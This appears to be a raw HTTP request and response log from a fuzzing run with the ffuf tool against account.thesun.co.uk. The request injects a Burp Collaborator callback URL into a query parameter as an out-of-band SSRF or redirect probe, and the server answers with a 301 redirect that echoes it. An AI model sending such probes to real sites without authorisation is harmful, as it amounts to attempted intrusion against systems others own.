GET /?ShowFieldTypesInDataEditView=http://hez0kgfv7rvym98k65ggntsp6gcb00.burpcollaborator.net HTTP/1.1
Host: account.thesun.co.uk
User-Agent: Fuzz Faster U Fool v1.2.0-git
Accept-Encoding: gzip


---- ↑ Request ---- Response ↓ ----

HTTP/1.1 301 Moved Permanently
Transfer-Encoding: chunked
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Cache-Control: max-age=3600
Cf-Ray: 6414281299531a6a-SIN
Cf-Request-Id: 0980775fa200001a6a7909d000000001
Connection: keep-alive
Date: Sat, 17 Apr 2021 08:06:52 GMT
Expires: Sat, 17 Apr 2021 09:06:52 GMT
Location: https://account.thesun.co.uk/?ShowFieldTypesInDataEditView=http://hez0kgfv7rvym98k65ggntsp6gcb00.burpcollaborator.net
Server: cloudflare
Vary: Accept-Encoding
X-Content-Type-Options: nosniff

0

